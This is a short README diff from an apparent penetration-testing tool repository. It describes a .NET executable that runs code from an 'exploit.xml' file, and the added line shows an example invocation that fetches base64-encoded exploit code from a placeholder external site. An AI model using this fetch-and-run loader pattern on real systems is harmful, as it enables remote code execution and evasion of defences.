awillard1/Pen-Test-Tools/exe-dot-net/dynamic-exe/dynamic-code/readme.md

 Example usage
 ==============
 1. just run it with exploit.xml in the directory of the exe
-2. or run it by passing the location of the file with how many iteration the code has been base64 encoded
+2. or run it by passing the location of the file with how many iteration the code has been base64 encoded example dynamiccode.exe "https://yourexternalsite/yourBase64DataExploit.xml

 It is important that the XML have the correct usings and correct version of the .net framework.